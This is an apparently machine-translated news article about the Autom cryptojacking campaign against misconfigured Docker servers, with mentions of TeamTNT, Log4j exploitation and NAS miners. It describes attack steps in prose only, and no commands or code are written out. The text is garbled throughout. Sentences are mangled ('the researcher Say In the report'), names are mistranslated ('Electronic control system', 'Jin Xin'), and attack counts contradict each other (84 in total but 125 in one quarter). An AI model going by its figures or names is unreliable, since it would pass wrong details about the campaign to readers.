New research published today shows that ongoing cryptocurrency mining activities have upgraded its arsenal, while adding new defensive evasion strategies that enable threat actors to hide intrusions and evade radar.
According to researchers from DevSecOps and cloud security company Aqua Security, since the first discovery in 2019, a total of 84 attacks on its honeypot servers have been recorded so far, 4 of which occurred in 2021. They have been tracking malware in the past Operation. Three years. In other words, 125 attacks were discovered in the third quarter of 2021 alone, indicating that the attacks have not slowed down.
The initial attack involved executing malicious commands while running the original image named “alpine:latest”, which resulted in the download of a shell script named “autom.sh”.
“Attackers usually use ordinary images and malicious commands to execute attacks because most organizations trust official images and allow them to be used,” the researcher Say In the report shared with Hacker News. “Over the years, the malicious commands added to the official mirrors for attacks have hardly changed. The main difference is the server where the shell script autom.sh is downloaded.”
The shell script initiates the attack sequence, allowing the attacker to create a new user account named “akay” and escalate its privileges to the root user, using this user to run arbitrary commands on the infected machine to mine cryptocurrency.
Although there were no special techniques to hide mining activities in the early stages of the 2019 event, the later version showed that its developers had taken extreme measures to prevent them from being detected and inspected. The main ones were to disable security mechanisms and the ability to retrieve mining activities. .Obfuscated mining shell script Base64 encoding Bypass the security tool five times.
Malware activities for hijacking computers to mine cryptocurrency have been controlled by multiple threat actors, such as Jin Xin, Has been found to scan the Internet Misconfigured Docker server Break into an unprotected host and install a previously undocumented strain of coin miner.
Most importantly, a hacker group called Team TNT already Observed striking Insecure Redis database server, Alibaba Elastic Computing Service (Electronic control system) Instances, exposed Docker APIs, and vulnerable Kubernetes clusters to execute malicious code with root privileges on the target host, and deploy cryptocurrency mining loads and credential stealing programs. also, Docker Hub account stolen It is also used to host malicious images, which are then used to distribute cryptocurrency miners.
In recent weeks, security vulnerabilities in the Log4j log library and Loopholes Recently, it was discovered in Atlassian Confluence that F5 BIG-IP, VMware vCenter, and Oracle WebLogic Server were abused to take over machines to mine cryptocurrency. This scheme is called cryptojacking. Earlier this month, QNAP, a manufacturer of network attached storage (NAS) devices, warned that cryptocurrency mining malware targeting its devices could consume about 50% of the total CPU usage.
“Miners are a low-risk way for cybercriminals to convert vulnerabilities into digital cash. The biggest risk to their cash flow is that competing miners find the same vulnerable server,” Sophos Senior Threat Researcher Sean Gallagher famous In the analysis of the Tor2Mine mining activity, the activity involved the use of PowerShell scripts to disable malware protection, execute miner loads, and obtain Windows credentials.
The researcher said: “Autom activities show that attackers are becoming more sophisticated, constantly improving their technology and ability to avoid detection by security solutions.” To prevent these threats, it is recommended to monitor suspicious container activity, perform dynamic image analysis, and Scan the environment regularly for misconfiguration issues.
